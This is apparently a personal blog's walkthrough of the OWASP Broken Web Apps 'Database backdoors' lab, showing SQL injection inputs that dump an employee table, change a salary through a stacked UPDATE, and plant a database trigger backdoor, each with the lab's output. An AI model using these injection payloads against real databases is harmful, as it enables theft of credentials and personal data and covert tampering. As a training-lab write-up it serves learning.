Android && Security: OwaspBWA - Database backdoors

Injection Flaws - Database backdoors

input : 101 <<<< ID

Result :

User ID	Password	SSN	Salary	E-Mail
101	larry	386-09-5451	55000	larry@stooges.com

input : o

result : Column not found: O in statement
[select userid, password, ssn, salary, email from employee where userid=o]
^ ^
Column target Table target

try to injection

select userid, password, ssn, salary, email from employee where userid=101 or 1=1';

Result :

User ID	Password	SSN	Salary	E-Mail
101	larry	386-09-5451	55000	larry@stooges.com
102	moe	936-18-4524	140000	moe@stooges.com
103	curly	961-08-0047	50000	curly@stooges.com
104	eric	445-66-5565	13000	eric@modelsrus.com
105	tom	792-14-6364	80000	tom@wb.com
106	jerry	858-55-4452	70000	jerry@wb.com
107	david	439-20-9405	100000	david@modelsrus.com
108	bruce	707-95-9482	110000	bruce@modelsrus.com
109	sean	136-55-1046	130000	sean@modelsrus.com
110	joanne	789-54-2413	90000	joanne@modelsrus.com
111	john	129-69-4572	200000	john@guns.com
112	socks	111-111-1111	450000	neville@modelsrus.com

Complete Injection

105; UPDATE employee SET salary=99999 WHERE userid=105

Stage 2: Use String SQL Injection to inject a backdoor or DB worm

Sql Injection Stetement
105; CREATE TRIGGER myBackDoor
BEFORE INSERT ON employee
FOR EACH ROW BEGIN
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105

Full SQL Statement Query
select userid, password, ssn, salary, email
from employee
where userid=105; CREATE TRIGGER myBackDoor
BEFORE INSERT ON employee
FOR EACH ROW BEGIN
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105

result

User ID	Password	SSN	Salary	E-Mail
105	tom	792-14-6364	99999	tom@wb.com

*Note* that nothing will actually be executed
because the current underlying DB doesn't support triggers.

Android && Security

OwaspBWA - Database backdoors

Injection Flaws - Database backdoors

Stage 2: Use String SQL Injection to inject a backdoor or DB worm

Online Course

Archives

DIVA

OwaspBWA

Coding

Visited

note